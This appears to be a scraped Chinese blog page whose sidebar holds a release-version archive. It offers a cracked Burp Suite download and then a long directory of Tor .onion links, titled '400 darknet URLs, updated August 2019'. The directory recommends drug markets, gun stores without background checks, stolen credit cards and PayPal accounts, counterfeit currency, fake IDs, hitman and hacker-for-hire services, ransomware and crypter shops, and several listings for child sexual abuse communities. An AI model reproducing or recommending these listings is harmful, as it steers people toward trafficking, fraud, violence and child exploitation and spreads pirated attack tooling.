v1.6.06
▼  八月 (2)
v1.6.05
v1.6.04
▼  七月 (2)
v1.6.03
v1.6.02
▼  六月 (1)
v1.6.01
▼  四月 (2)
V1.6
v1.6beta2
▼  三月 (1)
v1.6beta
▼  一月 (1)
v1.5.21
▼  2013 (17)
▼  十一月 (3)
v1.5.20
v1.5.19
v1.5.18
▼  九月 (3)
v1.5.17
v1.5.16
v1.5.15
▼  七月 (1)
v1.5.14
▼  六月 (2)
v1.5.13
v1.5.12
▼  四月 (2)
v1.5.11
v1.5.10
▼  三月 (2)
v1.5.09
v1.5.08
▼  二月 (3)
v1.5.07
v1.5.06
v1.5.05
▼  一月 (1)
v1.5.04
▼  2012 (14)
▼  十二月 (3)
v1.5.03
v1.5.02
v1.5.01
▼  十月 (3)
V1.5
v1.5rc3
v1.5rc2
▼  九月 (1)
v1.5rc1
▼  八月 (1)
v1.4.12
▼  七月 (1)
v1.4.11
▼  六月 (3)
v1.4.10
v1.4.09
v1.4.08
▼  四月 (1)
v1.4.07
►  三月 (1)
▼  2011 (9)
▼  十二月 (2)
v1.4.05
v1.4.04
▼  十一月 (1)
v1.4.03
▼  十月 (1)
v1.4.02
▼  八月 (1)
v1.4.01
▼  六月 (1)
V1.4
▼  五月 (2)
v1.4beta3
v1.4beta2
▼  三月 (1)
v1.4beta
▼  2010 (11)
▼  十一月 (1)
v1.3.09
▼  八月 (1)
v1.3.08
▼  七月 (1)
v1.3.07
▼  六月 (1)
v1.3.06
▼  五月 (2)
v1.3.05
v1.3.04
▼  四月 (2)
v1.3.03
v1.3.02
▼  三月 (1)
v1.3.01
▼  一月 (2)
V1.3
v1.3beta2
▼  2009 (18)
▼  十一月 (1)
v1.3beta
▼  十月 (1)
v1.2.17
▼  九月 (1)
v1.2.16
▼  八月 (2)
v1.2.15
v1.2.14
▼  七月 (2)
v1.2.13
v1.2.12
▼  六月 (1)
v1.2.11
▼  五月 (3)
V1.2.10
v1.2.09
v1.2.08
▼  四月 (3)
v1.2.07
v1.2.06
v1.2.05
▼  三月 (1)
v1.2.04
▼  二月 (3)
v1.2.03
v1.2.02
v1.2.01
▼  2008 (1)
▼  十二月 (1)
V1.2

burpsuite2.0.11破解版下载-burp破解版beta2.0.11
下载地址: https://github.com/ddosi/hack

暗网网址400个 2019年8月11日更新

暗网网址400个 2019年8月11日更新

Darknet Markets :

Darknet marketplace is the market where one can sell or buy products online. In darknet markets the payment mode where made more secure and clear. The darknet markets contain more products listed under many categories and each market have unique products in it.

Mostly the darknet markets contain drugs, weapons, fraud, pirated versions of software etc.,

http://pwoah7foa6au2pul.onion – Alphabay market – Here you can buy drugs, weapons, chemicals, etc., This is one of the best marketplaces in the darknet.

http://lchudifyeqm4ldjj.onion/ – Dream Market – This is the second largest market in the darknet. Here you can buy drugs and digital products.

http://hansamkt2rr6nfg3.onion/ – Hansa Market – It is also another popular deep web marketplace. Here you can buy drugs, weapons, digital products, tutorials, guide etc.,

http://valhallaxmn3fydu.onion – Valhalla – This is the biggest marketplace for buying drugs. Almost this marketplace has more drugs and people prefer this site to buy drugs.

http://wallstyizjhkrvmj.onion/ – Wallstreet market – This market has drugs, weapons, jewelry, software and malware, security and hosting etc.,

http://udujmgcoqw6o4cp4.onion – Underground – There are many items such as Prepaid cards, PayPal account, Diploma, Passport, ID Cards, Driver License, Phone, Computer, Tablets, Game Console, Hacker, Weapons, Professional Killer, Humen Organs, Medicines and so on.

RUSVPN For Darkweb And Porn Activities:

RUSVPN Service – Stay Anonymous Highly Secured

Legal Software Links In Darknet:

http://z3yt5342g77gfb3h.onion/ – World of Torrents

http://z3yt5342g77gfb3h.onion/ – Sail to the port and… catch syphillis

http://z3yt5342g77gfb3h.onion/ – Tradition of suck-cracking

http://z3yt5342g77gfb3h.onion/ – Piracy slowly going dead

http://z3yt5342g77gfb3h.onion/ – Keys from good sources

Other Popular MarketPlace:

http://morhx3irxknskwu5.onion – Hidden Financial Services – Western Union/PayPal Transfer [Recommended] & [Not a Scam]

http://ewad7i7uw2deouyg.onion – easyCARDS – Professionals on clone market – Cloned credit cards, pre-paid cards and Beneficial cards [Not a Scam]

http://uhb2gkawseo74dzo.onion/ – Receive SMS online anonymously and safely

http://itilyljv4vf6qgqm.onion – PayPal Baazar – Hacked PayPal Accounts

http://deepmartyqzffl5n.onion – DeepMarket Escrow Marketplace

http://hidden24vowyrcic.onion/ – Hidden MarketPlace

http://nnipbjberqh6lpvt.onion – Trusted Weed Seller [Recommended]

http://barcelonajmjylgn.onion/ – Champagne, MDMA, Fishscale, Coke, Meth, Weed & Concentrates

http://zlzbebjogb5xcuv5.onion/ – Dark shop – with the latest computer software and analytics bots

http://pislandp2ridcklw.onion – Nr1 Seller on Dream Market

http://ujnkg4uirpaiqejr.onion – Tor Hidden Wiki Fresh 2019

http://zocaloczzecchoaa.onion – Zocalo Marketplace

http://acropol4ti6ytzeh.onion – Acropolis

http://tochka3evlj3sxdv.onion – Tochka free market

http://outfor6jwcztwbpd.onion – Outlaw market

http://leomarketjdridoo.onion/ – Leo marketplace

http://254iloft5cheh2y2.onion/ – Apple market

http://rusilkustvysnokg.onion/ – Russian silk road

http://greenroxwc5po3ab.onion/ – Green road

http://cards5yvy44gucvo.onion/ – Plastic marketplace

http://spr3udtjiegxevzt.onion/ – Bloomfield Marketplace

http://hydraruzxpnew4af.onion/ – Hydra

http://l33ter2w7q4bytfh.onion/ – L33TER

http://fdwmarkvokb5i7wh.onion/ – Fdwmarket

http://traderouteilbgzt.onion/ – Trade Routes

http://rusilkusru6f57uw.onion/ – Russian Silkroad

http://ramp4qd6or3h364t.onion/ – Russian Anonymous Marketplace(RAMP)

http://r3yuljaqrzc7nurq.onion/ – Red Darknet

http://abraxa4n3q5dnosi.onion/ – Abraxas

http://tdetox4obdz62tri.onion/ – The Detox market

http://oasisnvwltxvmqqz.onion/ – Oasis marketplace

http://cryptomktgxdn2zd.onion – Crypto market

http://reloadxnkwi5nsbg.onion/ – Silk Road 3.0

http://25cs4ammearqrw4e.onion – Python market

http://midcity7ccxtrzhn.onion/ – Midlan City

http://trdealmgn4uvm42g.onion –  The Real deal

Deep Web Links Search Engines

http://hss3uro2hsxfogfq.onion/ – Not Evil Search Engine – Tor Search Engine has changed it’s name to Not Evil Search Engine.

http://grams7enufi7jmdl.onion/ – Grams Search Engine

http://msydqstlz2kzerdg.onion – AHMIA

http://3g2upl4pq6kufc4m.onion – Duck Duck Go

http://xmh57jrzrnw6insl.onion/ – Torch

http://sinbad66644fr5lq.onion/ – Sindbad

http://www.carontevaha5x626.onion/ – Caronte

http://dark23456yyx57ny.onion/ – Dark Matter

Deep Web Links Directory

These following .onion links consists of various working deep web links. Many deep web users use these .onion links directory.

http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki links

http://visitorfi5kl7q7i.onion/ – Visitor

http://darkdirmpmoq3uur.onion/ – Dark Dir

http://torlinksccquz7bi.onion/ – Tor Links

http://underdj5ziov3ic7.onion/ – UnderDir

http://jh32yv5zgayyyts3.onion/ – Onion List

http://linklistpugaiwpi.onion/ – Onion Link List

http://tt3j2x4k5ycaa5zt.onion/ – Daniel Onion Link List

http://directdal7bourmy.onion/ – Onion Directory

http://linksvgkrmdzguvo.onion/ – Tor Links List

http://5zf5yc2vwcnxgugv.onion/ – .Onion URL

http://befrpwfinqkww32q.onion/ – Diretorio Do Jisis

http://7cbqhjnlkivmigxf.onion/ – The Onion Crate

http://torvps7kzis5ujfz.onion/~user/ – HSMON

http://n2ha26oplph454e6.onion/ – Dark Web Links Usenet Server

http://wikitjerrta4qgz4.onion/ – The Hidden wiki

HOSTING SERVICE DEEP WEB LINKS

http://2222zui5d3psp4v5.onion – Kowloon Hosting Services

http://prometh5th5t5rfd.onion/ – Prometheus Hiddn Service

http://hostiysldm5iocpp.onion/ – Deep web Hosting

http://vilasamxj3nyexl2.onion/ – Vilsam Hosting Services

http://chchchiasaeljqgs.onion/ – Chan Hosting

http://bitservepd6bbxtq.onion/ – Bitserver

http://torhost3p7quiikq.onion/ – TorHosting

http://shv34p5cckiljkww.onion/ – Hidden Hosting service

http://mwl3znktk7mqogdv.onion/ – Creating Tor Place

http://mgibojrlzdfoajbn.onion/index.php – Tor Shop

http://tklxxs3rdzdjppnl.onion/ – Liberty’s Hackers Hosting Service

http://matrixtxri745dfw.onion/ – Matrix Trilogy

http://nr6juudpp4as4gjg.onion/ – Free hosting

DEEP WEB EMAIL LINKS – CHAT ROOM LINKS – ANONYMOUS EMAIL SENDER LINKS

EMAIL LINKS

https://protonirockerxow.onion/ – Proton Mail

http://zrwxcayqc4jgggnm.onion/ – Adunanza OnionMail Server

http://ncikv3i4qfzwy2qy.onion/ – AnonInbox

http://ozon3kdtlr6gtzjn.onion/ – O3mail

https://344c6kbnjnljjzlz.onion/ – VFEmail

http://cwu7eglxcabwttzf.onion/ – Confidential Mail

http://grrmailb3fxpjbwm.onion/ – TorGuerrillaMail

http://eozm6j6i4mmme2p5.onion/ – MailCity

http://sinbox4irsyaauzo.onion/ – SinBox

http://cockmailwwfvrtqj.onion/ – Cock.li

http://bitmailendavkbec.onion – Bitmessage Mail Gateway

http://torbox3uiot6wchz.onion/ – TorBox

http://it.louhlbgyupgktsw7.onion/ – OnionMail

http://oxicsiwet42jw4h4.onion/ – Bitmaila

http://lelantoss7bcnwbv.onion/ – Lelantos

http://vps69555.vps.ovh.ca/ – Alienet

http://vxx2tfzprjm56eka.onion/index.php – Cebolla Board

http://fuacantanj2vhfpw.onion/ – Anonymail

http://ogn5vbujhrvbihko.onion/ – irC2P

http://chatlistea3zbsck.onion/c/HispaChan – HispaChan

http://boytorqln5fxsokd.onion/ – BoysLand

http://onionirczesfffux.onion/ – Onionnet IRC Hideout

CHAT ROOM LINKS

http://r2j4xiyckibnyd45.onion/ – BoyChat

http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home

http://tt3j2x4k5ycaa5zt.onion/chat.php – Denial Home MyChat

http://vola7ileiax4ueow.onion/ – Volatile

http://mswmailgcjbye4sc.onion/ – MSW(My Secrete World)

http://ypbnurlwfis7xsei.onion/ – Anon Pastebin

http://bestchatzinhe3vc.onion/ – Best Chat

http://vlr2sz44rxf5wmuu.onion/ – ISIS Red Room

http://theboxmmvl6zg3wi.onion/ – TheBox

DEEP WEB FORUM LINKS

http://rrcc5uuudhh4oz3c.onion/ – Intel Exchange

http://parazite.nn.fi/roguesci/ – The Explosive and Weapon Forum

http://zw3crggtadila2sg.onion/imageboard/ – Tor Chan

http://anonymzn3twqpxq5.onion/

http://rhe4faeuhjs4ldc5.onion/

http://z2hjm7uhwisw5jm5.onion/ – WallStreet

http://support26v5pvkg6.onion/ – Pedo Support Community

http://suprbayoubiexnmp.onion/ – SuperBay

https://blue.thevendingmachine.pw/index.php – The Vending Machine

http://fbcy5ylyoeqzqzcr.onion/ – MoneyBook

http://realpissxny3hgyl.onion/ – Real Piss Voyeur Community real uncensored female pee spycams

http://zzq7gpluliw6iq7l.onion/threadlist.php? – The GreenMachine

http://rutorzzmfflzllk5.onion/ – Rutor

http://bm26rwk32m7u7rec.onion/ – The Majestic Garden

http://vrimutd6so6a565x.onion/ – The Dark Lair

http://answerstedhctbek.onion/ – Hidden Answers

http://dnmavengeradt4vo.onion/ – DNM Avengers

http://twittorxsun563wg.onion/ – Twitter Clone

http://i2vzg7f44bj4l3r7.onion/ – The Alliance

http://start.jungswtfwgjwile2.onion/ – GUYS.WTF

http://bfvfq7hjcdoinzo4.onion/ – Darknet Erotic Forum

http://rfwtogljhrrzxyrl.onion/ – Lolita City

http://wayawaytcl3k66fl.onion/ – WayaWay

http://joincgmc55oplang.onion/ – Cannabis Community

http://wpzvprpnhhcypnn4.onion/ – Free Colour

http://answerstedhctbek.onion/ – Hidden Answers

http://arcadian4nxs3pjr.onion/ – Arcadia Node

http://p22i3mcdceionj36.onion/index.php – Xen Foro

http://saefjmgij57x5gky.onion/ – Tor Stack Q&A community

http://krainkasnuawwxmu.onion/ – Dark web community

http://ji7nj2et2kyrxpsh.onion/ – Dark Web Forum

DEEP WEB DRUG MARKETPLACE – DARK WEB DRUGS MARKET

If you want to buy any drugs in deep web or dark web the followimg sites are most trutsed and useful.

http://nfi3plp7famvohxm.onion/ – Mafia Hash

http://eucannapggbtppdd.onion – EuCanna First class Cannabis HealthCare

http://limac6qxk43s3usf.onion/ – Best Peruvian Cocaine on the Market

http://doctordvoxnnammn.onion – Doctor Drug

http://auw6fzx756f6gqcd.onion/ – DeDope German Weed Store

http://do7dt6vuskgrz3sa.onion – 24 Hours PPC

http://pharmacpr5lpfin5.onion/ – BitPharma

http://smokerhv5hlklzh2.onion – Smokeables! Finest Organic Cannabis, shipping from the USA!

http://mollyworh4524fop.onion/ – Mollyworld No 1 provider of Crystal or Pills

http://weed46fkpfzc3lvi.onion – Ecviano Crew Luxury Weed Wholesale

http://7uvijlsswycvih2p.onion/ – iCocaine

http://abyssopyps3z4xof.onion/ – The French Connection

http://playboyb2af45y45.onion/ – Playboy Journal

http://pharma5jbbmwjoo3.onion/ – Onion Pharma

http://drugss5mif4vrbws.onion/ – Drug Store

http://dedopedhvmcsxylb.onion/ – DeDope

http://psyched25pydrgul.onion/ – BrainMagic

http://cannabi4ewmalq3g.onion/ – Cannabis UK

http://weedsragjdyuimdm.onion/ – WeedStore

http://cocahze7fqy4qwwx.onion/ – EUcocaine

http://smokerhv5hlklzh2.onion/ – Smokeables

http://weed46fkpfzc3lvi.onion/ – Evaino Crew Luxury Weed

http://chemspain7iw2zby.onion/ – Chem SPain

http://drugs4youpsxzpp2.onion/ – Drugs For You

http://darkheroesq46awl.onion/ – Darknet Heroes League

http://drugsfl4lgmxfetn.onion/ – Pharma Drugs Store

http://drugsqfazpkaitwq.onion/ – Drugs Dark Web Shop

http://cjakglmv3vidqwgt.onion/ – US Pharma

http://pushingtabu7itqj.onion/ – Pushing Taboo

http://eeyovrly7charuku.onion/ – Charlie UK

http://tytbeta57rw2onit.onion/ – To You Team

http://eupillu4np223oxe.onion/ – Euro Pills

http://mghreb4l5hdhiytu.onion/ – Meghrab Hash

http://elherbotsiddarol.onion/ – ElHerbolario’s Shop

http://yourdruhftworzg4.onion/ – Your Drugs

http://artsmankindxgcv5.onion/ – LSD The Church

http://x75csj7vzprjji5v.onion/ – Dutch Magic

http://slkushhma4pmfirg.onion/ – SoulKush

http://stonedkj4x37iaov.onion/ – Drug Store by stonned 100

http://ma3lisqktqdlg3t6.onion/ – Molly World

http://joincgmc55oplang.onion/ – Cannabies Community

http://newpdsuslmzqazvr.onion/ – People’s Drug Store

BITCOIN – PAYPAL ACCOUNTS – FINANCE – CREDIT CARD – DEBIT CARD DEEP WEB LINKS

BITCOINS

http://easycoinsayj7p5l.onion/ – EasyCoin Bitcoin Wallet and BitCoin Laundry

http://jzn5w5pac26sqef4.onion/ – We Buy Bitcoins

http://y3fpieiezy2sin4a.onion/ – HQER

http://qkj4drtgvpm7eecl.onion/ – CounterFeitUSD

http://ow24et3tetp6tvmk.onion/ – OnionWallet Anonymous Tor Bitcoins Wallet and Laundry

http://apple5e3lqymppzp.onion/ – 100*your coins

http://vp5rhkntohnccxea.onion/ – Hidden Wallet

FINANCE

GOLD

http://goldbarshighky3v.onion/ – AAA+  Gold Plated Bullion! PERTH / PAMP / RCM / APMEX / HERAEUS

MONEY TRANSFERS

http://creditvocefmyjhg.onion/ – Paypal and WU transfers plus credit cards

http://5xwgogyjnfcvrmvj.onion/ – A1 Quality Credit Cards

http://5xwgogyjnfcvrmvj.onion/ – CLONECARD&FAKE BILS

http://e7sin3urmxxcnu6a.onion/ – Finance – PayPal

http://vc3qj2iti5dkxryk.onion/ – Amazon GC Buy and Sell

http://gc4youuhrzbp5rlm.onion/ –  Amazon Gift Cards 25%

http://bjjkaebas6uywama.onion/ – CuberFreak Card the World

http://eqnbwy4b4k4lrlq5.onion/ – Credit Card Number Checker

http://dollarsfn45wiq4f.onion/ – USD4YOU – -Best Note on The Market

http://65px7xq64qrib2fx.onion/ – Low Balance Cards

http://vp5rhkntohnccxea.onion/ –  Hidden Wallet

http://usjudr3c6ez6tesi.onion/ – USJUD

http://fwx2oxihh3yi5eyu.onion/ – BitiPly

http://4r23alxe7mwyqa4s.onion/ – Double your BTC

http://qwmcl3jqq6bclzto.onion/ – PayPal Coins Solution

http://paypalacfi5pv4t2.onion/ – Paypal

http://omertavzkmsn6tp6.onion/ – Jocker’s Stash

http://agcardsxujh3vu5u.onion/ – Amazon Gift Cards

http://yuvox5mt6nulou72.onion/ – Grow Your Bitcoins

http://buyccoq36hlj6etg.onion/ – Credit Card BuyCC

http://btcmixxihego4qyg.onion/ – Bitcoin Mixer

http://anonymizer5lg2fz.onion/ – Bitcoin Anonymizer

http://xqxf2ggcud2kntck.onion/ – Russian Market

http://p2wasopjcodzszfm.onion/ – The House of Cards

http://vendorcugc6oppvb.onion/ – Credit Card and Paypal Vendor

http://fakebillkelmwaos.onion/ – Fake Bills

http://acteam2nmbucjnht.onion/ – AC Team

http://Fightckxiykml2xu.onion/ – Fight Club

http://torcvvq44o7ofjuu.onion/ – Tor Marke

http://kplatypxb2aecznv.onion/ – Krypto Platypus

http://oq3y6kvdjmhcavto.onion/ – Double Bitcoins

http://tknijuhhdg4476vl.onion/ – Templar Nights

http://ccghmfd2x74s7i22.onion/ – Original Skimmed Cards

http://uzpsnetq2lpx6pv6.onion/ – Gutten Burgs Counterfeit Factory

http://o6klk2vxlpunyqt6.onion/ – Cheap Euro

http://qputrq3ejx42btla.onion/ – TQC

http://dreamrvfuqrpzn4q.onion/ – Dream Weavers

http://prepaid3jdde64ro.onion/ – Euphoric Oblivian

http://ccxdnvotswsk2c3f.onion/ – Clone Card Crew

http://blackph5fuiz72bf.onion/ – Black and white card service

http://bitcloak43blmhmn.onion/ – BitClock Bitcoin Mixer

http://penguinsmbshtgmf.onion/ – Penguin Mixer

http://coinmixibh45abn7.onion/ – Coin Mixer

http://bestshop3neaglxk.onion/ – Legend’s Best Shop

http://burgerfroz4jrjwt.onion/ – Burger

http://3tnqzaoam4g3v5sj.onion/ – Nine9.ninja

http://ozgyidpmrnvsyec5.onion/ – Paypal Vendor

http://ppextalynbst3xqm.onion/ – Paypal Cashout Service

http://accountlwghunkeg.onion/ – Paypal

http://tye72sog65g5ehlp.onion/ – Paypal Diner

http://5ifblitg2ywjjo2t.onion/ – Open Source Bitcoin Mixer

http://sexdq7iwyb4u7ah4.onion/ – Sexdumps

http://yaleshopznl7dyus.onion/ – Yale Lodge

HITMAN – ESCROW – RENT A HACKER DEEP WEB LINKS

http://lxhbgl43362zhmoc.onion/ – Hitman Service – Hitman/service

http://bjjkaebas6uywama.onion/ – CuberFreak Card the World – Service/Cards/Gadgets

http://eqnbwy4b4k4lrlq5.onion/ – Cards/Service

http://edsec5zn26zqjwry.onion/ – Edsec – Service

https://of4fjg5hgleayzw3.onion/ – PUSCII – Services/File Sharing

http://hackerrljqhmq6jb.onion – Hacking – Hacker/Service

http://arcbatjfohvf2ahk.onion/ – Bitcoin Escrow – Services/Escrow

http://fbyr455vwvkpzp5k.onion/ – We Buy Bitcoin – Bitcoin Sell/Services

http://vaultu7dxw5bbg37.onion/ – LiteVault – Service/Litecoin wallet

http://cleancondgqja34b.onion/ – Clean coin – Service/Bitcoin Laundry

http://fxwyfqrcj67nxal3.onion/ – GoldDealers – Service/Gold

http://dtt6tdtgroj63iud.onion/webdesign/index.html – Deep Design – Service/Web Design

http://dtt6tdtgroj63iud.onion/hitman/ – Torminator – Service/Hitman

http://2ogmrlfzdthnwkez.onion/ –Rent a Hacker – Service/Hacking

http://abbujjh5vqtq77wg.onion/ – Onion Identity Service – Service/Documents

http://xfnwyig7olypdq5r.onion/ – USA Citizenship – Service/Documents

http://fakeidskhfik46ux.onion/ – FakeID – Service/Documents

http://money2mxtcfcauot.onion/ – Counterfeitng Center – Service/Documents

http://teddanzignblrntr.onion/ – Novelty ID by TED Danzig – Service/Documents

http://cmarketsiuhtiix5.onion/ – CMarket(Criminal Market) – Service/Documents

http://mystorea4mbkgt76.onion/ – MyStore – Service/Store

http://market7ow7cuw2hz.onion/ – Markete – Service/Store

http://chbetteratd6wskq.onion/ – Choose a Better – Service/Consultant

http://rsprjqyxhf25l3qd.onion/ – Detective Check – Service/Detective

http://escrowq5tus5jpgw.onion/ – Escrow Defense – Service/Escrow

http://devcenterds3qc5z.onion/ – Infinite Monkeys Darknet DevOps – Service/Web Design

http://hiremew3tryzea3d.onion/ – Hire Me – Service/Job

http://prodarktzz3lnwrr.onion/ – ProDark – Service/Anything

http://safebtck4qejiero.onion/ – SafePay BTC – Service/Escrow

http://nojjxqzd6ofvkjss.onion/ – Paper Writing Program – Service/Writing

DEEP WEB MOVIES – DEEP WEB TORRENTS – DEEP WEB GAMES – DEEP WEB MUSIC LINKS

Here i’m going to provide you some intersting links in deep web – movies,music,games,torrents links of deep web. Below are the best links for movies, music etc., You can enjoy movies games music everything anonymously online.

Deep Web Music Links

http://artifaxdeep.torpress2sarn7xw.onion/ –  Artifix Radio – Movie/Music/Radio

http://radiocbsi2q27tob.onion/ – Movie/Music/Radio

http://663wbgqczxp445am.onion/ – Index of – Movie/Music/Radio

http://kurdox4tfzujxddq.onion/ – Radio Jobiwan – Movie/Music/Radio

http://w5ifkainqlgtvg7a.onion/ – World News Radio – Radio

http://hlsf2cw74ydheg6f.onion/ – Premium Music Codes – Music

Deep Web Games Links

http://bettorzztykidrx2.onion – Bettor

http://theches3nacocgsc.onion/ – The Chess

http://betcoinahk4j27yb.onion/ – Hidden Bitcoin

http://5p6dpc344vsbigv7.onion/ – PHDCasino

http://rswwpapessp3xxpw.onion/ – Online Shans

http://hg5km4y37lgir6r3.onion/ – Euro Buk Simulator 2014

http://sntfgwfami5fdbn5.onion/ – Sonic/Tails

http://hideout6eiazeoyp.onion – The Hideout

http://fixedlwgc3burzts.onion/ – European Leagues Fixed Matches

http://wvxwdchqvprqfkl4.onion/ – Lucky Bitcoins

http://torbet777o4era3q.onion/ – TorBet777

http://3r7ailix2glqhrwb.onion/

http://hb6y4jt4pnfb52v6.onion/ – Online Lotto

http://casinou2gs2xlkfw.onion/ – Casino Royale

http://football4prz44rs.onion/ – European fixed matches by ZETA

Deep Web Torrents Links

http://uj3wazyk5u4hnvtk.onion/ – The PiratesBay

http://duskgytldkxiuqc6.onion/

http://sblib3fk2gryb46d.onion/ – Traum library mirror 60GB of Russian and English books

http://kpynyvym6xqi7wz2.onion/files.html – ParaZite

http://wbyi72yt6gitdcqd.onion/ – NewsFileSearch.com

http://wtwfzc6ty2s6x4po.onion/

http://zmovietoropzaid3.onion/ – ZMovie

http://d5eyi24facorsljv.onion/ – Welcome to deep web Ponies – Movies/Shows

http://www.solarmovie6rystf.onion/ – Solar Movies

http://hiotuxliwisbp6mi.onion/ – Index of

http://dsenxis5txr4zbxe.onion/ – NNM Club

Weapons – Software – Hacking Deep Web Links

Weapons Dark Web Links

http://blackz5jtkief7mz.onion/ – Black Market

http://armoryohajjhou5m.onion/ – Armory

http://6xbcodgrkz3tffpv.onion/ – No background Check Gun Store

http://gunsjmzh2btr7lpy.onion/ – Guns Dark Market

http://gunsdtk47tolcrre.onion/ –  UK Guns and Ammo Stores

http://g4r2pz2r22ztdcsm.onion/ – Black Markets

http://2kka4f23pcxgqkpv.onion/ – Euro Gun

http://armoryx7kvdq3jds.onion/ – The Armory

http://7p4phtqnrzrg5ju5.onion/ – Black Ghost East Europe Stuff

http://dtkeubgx47jeqvag.onion/ – Best Gun Market

http://vi5ydynhfco62g4v.onion/ – Glock’s and Taurus

http://gunsdarkhzyowteb.onion/ – Gun’s Dark Market

http://gunsganjkiexjkew.onion/ – Guns and Ganja Private Club

http://luckp47s6xhz26rn.onion/ – Lucky 47 Shop

http://drkseidwayn6uc5x.onion/ – DrkSeid

http://armoryohajjhou5m.onion/ – Deep Web Gun Store

http://weapon5cd6o72mny.onion/ – Black Market

http://pistolcqex2ecr5r.onion/ – Euro Guns

http://5xxqhn7qbtug7cag.onion/ – Hand Guns – Alpha Guns

http://kwlxvnmxiu2vfvcy.onion/ – Ghost Fox FireArms Hub

http://ttagroupnnowjzzx.onion/ – The Tor Armory

SOFTWARE AND TECHNOLOGY DEEP WEB LINKS

http://exoduockgfq3ikf7.onion/ – Exodus – Malware, Leaks, Exploits, Dumps

http://atlas777hhh7mcs7.onion/ – Atlas

http://distropbucaekpgf.onion/ – DevStaff Crete Destro

http://54ogum7gwxhtgiya.onion/ – Digital Pawn Shop

http://ytutzbser3ons3kf.onion/ – Automatic Faucet Bot

http://expressobutiolem.onion/ – Express VPN

http://mtcngenbbypcakoh.onion/ – Western Union MTCN Generator

http://mggenoj6brpkt3je.onion/ – MoneyGram Generator

http://i2vpnraen5bggqge.onion/ – TGVPN

http://pfoxkj3p65uyc5pe.onion/ – PrivateFox

HACKING SOFTWARE – HACKS – VIRUS – MALWARE DEEP WEB LINKS

http://6dvj6v5imhny3anf.onion/ – Cyber Guerrilla

http://7kuslhhtlooylgu4.onion/ – Perl Script

http://encryptor3awk6px.onion/ – Encryptor Raas

http://hackerrljqhmq6jb.onion/ – Hacking

http://hackcanl2o4lvmnv.onion/ – Hack Canada

http://xjj6wjpujmh4evkb.onion/ – My Free Cams

http://vb75uj2ap3hyyava.onion/ – Hacking is Art

http://hackarmgq2n2erux.onion/ – HackerMoury

http://fb5hkzag3r4w22u2.onion/ – Hack Facebook Account

http://netflixxb32gnsvy.onion/ – Hacked Netflix Account

http://hackharhoaw3yk5q.onion/ – Hacker For Hire

http://haxedcwi5duu363s.onion/ – Have I been Hacked

http://drugszun7tvsgsaa.onion/ – People Drug Store

http://sipherl2xokvirou.onion/ – Sipher Project

http://atlantispvza4ylp.onion/ – Atlantis – Search for Hacked Data

http://edfbn5gfuaj2bc2w.onion/ – Crypter

http://aeriszyr4wbpvuo2.onion/ – Independent Crypto

http://pbzl5p2uyganwo3k.onion/ – The Onion Scanner

http://sdata7sidixxhxpb.onion/ – Street Data Mobile Technology

http://6f6ejaiiixypfqaf.onion/ – Debian BackPort

http://tordoxov3jitflky.onion/ – TorDox

Commercial Marketplace

Commercial Marketplace is where you can hire a hacker, buy cards, make an online transaction, create a fake document etc.,

http://oiiuv2gwl2jhvg3j.onion/ – BesaMafia

http://bjjkaebas6uywama.onion/ – CuberFreak Card the World

http://eqnbwy4b4k4lrlq5.onion/ – You can check your card validity here

http://dugonj4mglbrusq6.onion/ – Safe Pay BTC

http://edsec5zn26zqjwry.onion/ – Edsec

http://en35tfp3p3a4wqwb.onion/  – USFakeID

http://doxtorg7natnwyz5.onion/ – The Doxtors Service

http://agenttoe2dlvxdei.onion/ – Agentto Service

Gadgets Deep Web Links

If you want to buy any Latest Gadgets I prefer the below links to buy Gadgets. Because of the rating and review of the seller for any products may vary.

http://akvilonom27p5hvb.onion/ – Electronic gadgets market

http://atlas777hhh7mcs7.onion/ – Atlas

http://amazonfkuuy6g3ou.onion/apple-phones.php – Deep Tech

http://35flmpspwpnarbos.onion/ – Apple World

http://ljekq2ejc62q76dy.onion/ – iStore

http://etrrdbuorwng2hkw.onion/ – Samsung

http://2wkwv7m4hetvqo3d.onion/ – Z33 Shop

http://2iec4gqs2n4pucl7.onion/ – iPhone and Apple Products

http://cardedlxzxsphu5y.onion/ – Carded Store – Smartphones

http://mobileay2syyw6qf.onion/ – Mobile Store

http://electrotev3tgo2p.onion/ – Electronic

http://techshop255zo43b.onion/ – Tech Shop

http://amazonfkuuy6g3ou.onion/ – Deep Tech

http://bitstorenctdwhmo.onion/ – Bitstore

http://cardtecdxboivkro.onion/ – CardTech

http://xym5qdjlqrpq2rj7.onion/ – Buy Encrypted BlackPhone


暗网网址 onion dir🔰 Tor links

暗网网址 onion dir Tor links

OnionDir – Deep Web Link Directory

dirnxxdraygbifgc.onion – Your copy and paste friendly .onion link list. Feel free to copy this list to forums, pastebins etc so people can find hidden service links that actually work!
You can add new links here, please check if the site is up before you add it, i will delete not working sites on a regular basis.

Categories:

Hidden Service lists and search engines

http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine
http://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Engine
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki
http://32rfckwuorlf4dlv.onion/ – Onion URL Repository
http://e266al32vpuorbyg.onion/bookmarks.php – Dark Nexus
http://5plvrsgydwy2sgce.onion/ – Seeks Search
http://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenet
http://nlmymchrmnlmbnii.onion/ – Is It Up?
http://kpynyvym6xqi7wz2.onion/links.html – ParaZite
http://wiki5kauuihowqi5.onion/ – Onion Wiki
http://torwikignoueupfm.onion/index.php?title=Main_Page – Tor Wiki
http://kpvz7ki2v5agwt35.onion – The Hidden Wiki
http://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity Online
http://torlinkbgs6aabns.onion/ – TorLinks
http://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urls
http://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wiki
http://xdagknwjc7aaytzh.onion/ – Anonet Webproxy
http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting
http://3fyb44wdhnd2ghhl.onion/ – All You’re Base
http://j6im4v42ur6dpic3.onion/ – TorProject Archive
http://p3igkncehackjtib.onion/ – TorProject Media
http://kbhpodhnfxl3clb4.onion – Tor Search
http://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)
http://dppmfxaacucguzpc.onion/ – TorDir – One of the oldest link lists on Tor

Marketplace Financial

